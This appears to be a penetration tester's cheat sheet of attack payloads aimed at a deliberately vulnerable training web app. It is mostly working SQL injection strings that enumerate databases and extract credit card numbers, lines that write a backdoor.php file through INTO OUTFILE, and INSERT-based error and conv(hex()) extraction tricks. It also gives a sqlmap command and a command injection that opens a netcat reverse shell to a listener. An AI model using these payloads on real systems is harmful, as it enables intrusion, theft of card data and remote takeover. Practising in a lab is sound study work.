### SELECT ###
# basic
' or 1=1 --
' union select null --
' union select null, null, null, null, null --
# get databases
' union select null, (select group_concat(distinct table_schema separator ',') from information_schema.tables order by table_schema), null, null, null --
# get tables
' union select null, (select group_concat(distinct table_name separator ',') from information_schema.tables where table_schema='owasp10' order by table_name), null, null, null --
# get columns
' union select null, (select group_concat(distinct column_name separator ',') from information_schema.columns where table_schema='owasp10' and table_name='credit_cards' order by table_name), null, null, null --
# get cc numbers
' union select null, (select concat(ccid, ':', ccnumber,':', ccv,':', expiration) from owasp10.credit_cards limit 1), null, null, null --
# get cc numbers 3x
' union select null, (select concat(ccid, ':', ccnumber,':', ccv,':', expiration) from owasp10.credit_cards limit 1), (select concat(ccid, ':', ccnumber,':', ccv,':', expiration) from owasp10.credit_cards limit 2,1), (select concat(ccid, ':', ccnumber,':', ccv,':', expiration) from owasp10.credit_cards limit 3,1), null --
' union select null, null, null, null, (select "" into outfile "/var/www/mutillidae/backdoor.php") --
' union select null, null, null, null, (select "" into outfile "/tmp/backdoor.php") --
### INSERT ###
# Basic
# Insert error name_const()
' or (SELECT * FROM (SELECT (name_const(version(),1)), name_const(version(),1)) a) or ' # can only get the version in latest version
# ERROR 1210 (HY000): Incorrect arguments to NAME_CONST <-- cannot do more
# ERROR 1060 (42S21): Duplicate column name '2' <-- Good to go
' or (SELECT * FROM (SELECT name_const((SELECT 2), 1),name_const((SELECT 2),1)) a) or '
' or (SELECT * FROM (SELECT name_const((SELECT GROUP_CONCAT(distinct table_name separator ',') FROM information_schema.tables WHERE table_schema=database() order by table_name),1),name_const((SELECT GROUP_CONCAT(distinct table_name separator ',') FROM information_schema.tables WHERE table_schema=database() order by table_name),1)) a) or '
# Insert error extractvalue() -- not supported by this DB
' or extractvalue(1,concat(0x7e,database())) or '
# There is no string concatenation in MySQL, we cannot UNION into an INSERT statement, and we cannot simply chain a query with a semi-colon in mysql.
# we can, however, perform math. (This will not work in strict mode, i.e. MySQL 5.7.5+)
# Demo strings are numbers
select 'osanda' = 0;
select 'osanda'+~0; # ~0 is BIGINT, this gives us a double
select ~0+0e0; # DOUBLE
select (~0+0e0) = ('osanda' + ~0) ; # Same
select 'osanda' | ~0; # we can extract 8-byte strings as numbers
# Insert conv(hex())
select conv(hex('01234567'), 16, 10);
select unhex(conv(3472611983179986487, 10, 16));
# conv(hex()) w/ substr() -- select conv(hex(substr(user(),1 + (n-1) * 8, 8 * n)), 16, 10);
' | conv(hex(substr(user(),1, 8)), 16, 10) | ' ## select unhex(conv(8245931987826405219, 10, 16));
' | conv(hex(substr(user(),9, 16)), 16, 10) | ' ## select unhex(conv(107118236496756, 10, 16));
# In-band injection
asdf', version()) -- # password field, password becomes asdf, signature gets replaced
### SQLMAP ###
sqlmap -u "192.168.56.101/mutillidae/index.php?page=user-info.php&username=lotus&password=lotus&user-info-php-submit-button=View+Account+Details"
### COMMAND INJECTION ###
# Basic
&& echo ‘asdf’
# Listen for connect-back
nc -l -p 5000 # don't specify an IP here, it will filter
# Connect-back
&& nc 192.168.56.102 5000 -e /bin/bash
### XSS ###
# Pen Test Tool Lookup:
"}}); }